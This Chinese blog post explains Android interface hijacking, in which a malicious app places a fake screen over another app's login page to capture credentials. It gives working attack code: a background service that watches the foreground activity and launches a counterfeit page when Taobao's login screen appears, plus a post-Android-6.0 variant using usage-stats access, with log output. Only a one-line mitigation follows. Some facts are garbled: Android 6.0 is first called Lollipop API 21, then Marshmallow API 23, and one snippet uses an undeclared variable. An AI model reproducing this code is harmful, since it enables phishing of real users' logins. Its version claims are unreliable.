Activity劫持的危害
界面劫持是指当客户端程序调用一个应用界面时,被恶意的第三方程序探知,如果该界面组件是恶意程序预设的攻击对象,恶意程序立即启动自己的仿冒界面并覆盖在客户端程序界面之上。此时用户可能在无察觉的情况下将自己的账号、密码信息输入到仿冒的信息输入界面中,恶意程序再把这些数据返回到服务器中,完成钓鱼攻击。
目前主要的界面劫持攻击通常发生在Android6.0以下的设备中。界面劫持风险将导致用户关键信息,例如账号、密码、银行卡等关键信息被窃取等风险。
Android 6.0 前怎么劫持
Android 6.0(Android 6.0 = Lollipop API level 21) 之前劫持的方法很简单。
ActivityManager activityManager = (ActivityManager) this.getSystemService(Context.ACTIVITY_SERVICE);
ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);
String shortClassName = info.topActivity.getShortClassName(); //类名
String className = info.topActivity.getClassName(); //完整类名
String packageName = info.topActivity.getPackageName(); //包名
一个完整的劫持案例
注册一个空白Activity,作为冒充的页面
AttackActivity- 注册一个服务,循环监听顶层Activity包名
package com.example.Demo;
import android.app.ActivityManager;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.support.annotation.Nullable;
import android.util.Log;
import android.os.Handler;
/**
* Created by Mysticbinary on 2019/3/25.
*/
public class AttackService extends Service {
private Handler handler;
private int temp = 1;
@Nullable
@Override
public IBinder onBind(Intent intent) {
return null;
}
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
Log.i("777777:", "后台启动...");
handler = new Handler();
new Thread(new Runnable() {
@Override
public void run() {
while (temp == 1) {
try {
Log.i("777777:", "handler run ing...");
ActivityManager manager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);
//String shortClassName = info.topActivity.getShortClassName(); //类名
String className = info.topActivity.getClassName(); //完整类名
//String packageName = info.topActivity.getPackageName(); //包名
//Log.i("777777 :", shortClassName);
Log.i("777777 当前Top Activity :", className);
//Log.i("777777 :", packageName);
if(className.contains("com.taobao.controllers.activity.LoginActivity")){
Log.i("777777 :", "开始跳转到假页面去!!!");
Intent intent = new Intent(getBaseContext(), AttackActivity.class);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
getApplication().startActivity(intent);
}
Thread.sleep(2000);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
}
}).start();
return super.onStartCommand(intent, flags, startId);
}
@Override
public void onDestroy() {
temp = 0;
super.onDestroy();
Log.i("777777 :", "后台结束!");
}
}
Android 6.0 后怎么劫持
到了Android6.0版本之后,即Marshmallow(api level 23)时,大部分方法都失效了,如同getSystemService(Context.ACTIVITY_SERVICE)之类的方法除了能获取自己app中的信息外,还能获取启动器的信息,其它APP一律不显示。道理是很简单的,Marshmallow以权限严格著称,因此对于这种可能泄露其他应用信息的方法一概禁止了。
可以看出到了Android6.0后,即使有方法能获取到,也是非常麻烦的,需要用户手动授权的。
一个完整的劫持案例
1.修改AndroidManifest.xml,添加权限
<?xml version="1.0" encoding="utf-8"?>
<!--注意这里:添加xmlns:tools="http://schemas.android.com/tools"-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
package="com.dumaisoft.wxb.gettopactivity">
<application
...
</application>
<!--注意这里:添加权限-->
<uses-permission
android:name="android.permission.PACKAGE_USAGE_STATS"
tools:ignore="ProtectedPermissions"/>
</manifest>
2.检测并引导用户开启权限
从Marshmallow开始,用户可以一个一个的给app授权,意味着系统对权限的管理更加严格了。这里,我们的app必须让用户开启“Apps with usage access”权限。检测用户是否开启权限的代码;
//检测用户是否对本app开启了“Apps with usage access”权限
private boolean hasPermission() {
AppOpsManager appOps = (AppOpsManager)
getSystemService(Context.APP_OPS_SERVICE);
int mode = 0;
if (Build.VERSION.SDK_INT > Build.VERSION_CODES.KITKAT) {
mode = appOps.checkOpNoThrow(AppOpsManager.OPSTR_GET_USAGE_STATS,
android.os.Process.myUid(), getPackageName());
}
return mode == AppOpsManager.MODE_ALLOWED;
}
引导用户开启权限的代码
private static final int MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS = 1101;
@Override
protected void onActivityResult(int requestCode, int resultCode,
Intent data) {
if (requestCode == MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS) {
if (!hasPermission()) {
//若用户未开启权限,则引导用户开启“Apps with usage access”权限
startActivityForResult(
new Intent(Settings.ACTION_USAGE_ACCESS_SETTINGS),
MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS);
}
}
}
3.使用UsageStatsManager来获取当前运行的app
private void getTopApp(Context context) {
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
UsageStatsManager m = (UsageStatsManager) context.getSystemService(Context.USAGE_STATS_SERVICE);
if (m != null) {
long now = System.currentTimeMillis();
//获取60秒之内的应用数据
List<UsageStats> stats = m.queryUsageStats(UsageStatsManager.INTERVAL_BEST, now - 60 * 1000, now);
Log.i(TAG, "Running app number in last 60 seconds : " + stats.size());
String topActivity = "";
//取得最近运行的一个app,即当前运行的app
if ((stats != null) && (!stats.isEmpty())) {
int j = 0;
for (int i = 0; i < stats.size(); i++) {
if (stats.get(i).getLastTimeUsed() > stats.get(j).getLastTimeUsed()) {
j = i;
}
}
topActivity = stats.get(j).getPackageName();
}
Log.i(TAG, "top running app is : "+topActivity);
}
}
}
获取的Log
04-24 13:28:06.041 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis
04-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis
04-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer
04-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer
04-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.messaging
04-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
修复建议
页面切换到后台时,打个Toast提示一下。
例如 大部分的银行类APP里面的任何界面切换到后台都会Toast提示:XXXX已切换至后台运行